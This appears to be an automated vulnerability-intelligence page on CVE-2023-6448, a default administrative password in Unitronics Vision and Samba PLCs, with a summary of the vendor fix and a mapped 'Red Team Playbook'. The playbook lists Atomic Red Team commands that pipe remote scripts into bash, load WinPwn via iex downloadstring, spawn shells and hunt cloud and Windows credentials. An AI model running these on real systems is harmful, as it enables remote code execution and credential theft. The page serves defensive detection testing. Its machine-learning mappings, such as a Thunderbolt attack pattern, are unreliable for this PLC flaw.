CVE-2023-6448
Overview
This vulnerability is an authentication bypass caused by the use of a hardcoded default administrative password in Unitronics VisiLogic firmware versions prior to 9.9.00. The affected component is the authentication mechanism of Vision and Samba PLCs and HMIs, which fails to enforce unique credentials. This flaw allows unauthenticated network actors to bypass normal authentication controls and gain administrative access to the device.
Vulnerability Description
Unitronics VisiLogic before version 9.9.00, used in Vision and Samba PLCs and HMIs, uses a default administrative password. An unauthenticated attacker with network access can take administrative control of a vulnerable system.
Impact
An unauthenticated attacker with network access can assume full administrative control over affected Unitronics Vision and Samba devices. This enables modification of device configurations, manipulation of programmable logic controller operations, and potential disruption of industrial processes. The lack of authentication requirements means no credentials or user interaction are needed, facilitating unauthorized access to critical infrastructure components, potentially leading to operational downtime or safety hazards in water and wastewater systems and other industrial environments.
Solution
Unitronics has released firmware version 9.9.00 and later to address this vulnerability by removing the default administrative password. Users should upgrade all affected Vision and Samba PLCs and HMIs to firmware version 9.9.00 or higher as detailed in the vendor advisory (Unitronics Cybersecurity Advisory 2023-001). Detailed patch instructions and version changes are available at the official Unitronics support site and advisory PDF: https://downloads.unitronicsplc.com/Sites/plc/Technical_Library/Unitronics-Cybersecurity-Advisory-2023-001-CVE-2023-6448.pdf.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from the use of a default administrative password in various models of Unitronics PLCs and HMIs, specifically those running VisiLogic firmware versions prior to 9.9.00. This design flaw allows an unauthenticated attacker with network access to gain administrative control over the affected systems. The reliance on a default password, which is often publicly documented or easily guessable, significantly lowers the barrier to entry for potential attackers. Once access is obtained, an attacker can manipulate system settings, alter operational parameters, or even disrupt critical processes, posing a serious threat to the integrity and availability of industrial operations.
Attack vectors for exploiting this vulnerability are notably straightforward. An attacker could leverage network access to initiate a connection to the vulnerable devices, utilizing the default administrative credentials to gain unauthorized access. This scenario is particularly concerning in environments where these PLCs and HMIs are integrated into broader industrial control systems, as the attacker could potentially pivot to other connected systems or devices, escalating their access and impact. Additionally, the lack of authentication requirements means that even individuals with minimal technical expertise could execute an attack, further amplifying the risk.
The real-world impact of this vulnerability is profound, especially in sectors reliant on automated processes, such as manufacturing, energy, and utilities. Unauthorized access to PLCs can lead to operational disruptions, safety hazards, and financial losses. For instance, an attacker could alter production parameters, leading to defective products or equipment damage. Furthermore, the potential for cascading failures in interconnected systems could result in widespread outages or safety incidents, prompting regulatory scrutiny and reputational damage for affected organizations. The business risk extends beyond immediate financial implications, as organizations may face legal liabilities and increased insurance premiums following a breach.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, updating to the latest firmware version that addresses this security flaw is critical. Regularly reviewing and changing default passwords is essential to harden security postures. Additionally, organizations should employ network segmentation to limit access to critical systems, ensuring that only authorized personnel can interact with PLCs and HMIs. Intrusion detection systems (IDS) can also be deployed to monitor for unusual access patterns or unauthorized attempts to connect to these devices. Training staff on cybersecurity best practices and the importance of securing industrial control systems can further bolster defenses against potential exploitation.
In conclusion, the vulnerability stemming from the use of default administrative passwords in Unitronics PLCs and HMIs represents a significant cybersecurity threat. The ease of exploitation combined with the potential for severe operational impact necessitates immediate attention from organizations utilizing these devices. By adopting proactive detection and mitigation strategies, businesses can safeguard their industrial environments against unauthorized access and the associated risks.
Affected Products (17)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Unitronics | Vision1210 Firmware | All |
cpe:2.3:o:unitronics:vision1210_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision1040 Firmware | All |
cpe:2.3:o:unitronics:vision1040_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision700 Firmware | All |
cpe:2.3:o:unitronics:vision700_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision570 Firmware | All |
cpe:2.3:o:unitronics:vision570_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision560 Firmware | All |
cpe:2.3:o:unitronics:vision560_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision430 Firmware | All |
cpe:2.3:o:unitronics:vision430_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision350 Firmware | All |
cpe:2.3:o:unitronics:vision350_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision130 Firmware | All |
cpe:2.3:o:unitronics:vision130_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision230 Firmware | All |
cpe:2.3:o:unitronics:vision230_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision280 Firmware | All |
cpe:2.3:o:unitronics:vision280_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision290 Firmware | All |
cpe:2.3:o:unitronics:vision290_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision530 Firmware | All |
cpe:2.3:o:unitronics:vision530_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Vision120 Firmware | All |
cpe:2.3:o:unitronics:vision120_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Visilogic | All |
cpe:2.3:a:unitronics:visilogic:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Samba 3.5 Firmware | All |
cpe:2.3:o:unitronics:samba_3.5_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Samba 4.3 Firmware | All |
cpe:2.3:o:unitronics:samba_4.3_firmware:*:*:*:*:*:*:*:*
|
|
|
Unitronics | Samba 7 Firmware | All |
cpe:2.3:o:unitronics:samba_7_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
41%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-6448 |
| cisa.gov |
GitHub CVE
government-resource
|
https://www.cisa.gov/news-events/alerts/2023/11/28/exploitation-unitronics-plcs-used-water-and-wastewater-systems |
| unitronicsplc.com |
GitHub CVE
|
https://www.unitronicsplc.com/cyber_security_vision-samba/ |
| downloads.unitronicsplc.com |
GitHub CVE
release-notes
|
https://downloads.unitronicsplc.com/Sites/plc/Visilogic/Version_Changes-Bug_Reports/VisiLogic%209.9.00%20Version%20changes.pdf |
| downloads.unitronicsplc.com |
GitHub CVE
vendor-advisory
|
https://downloads.unitronicsplc.com/Sites/plc/Technical_Library/Unitronics-Cybersecurity-Advisory-2023-001-CVE-2023-6448.pdf |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-6448 |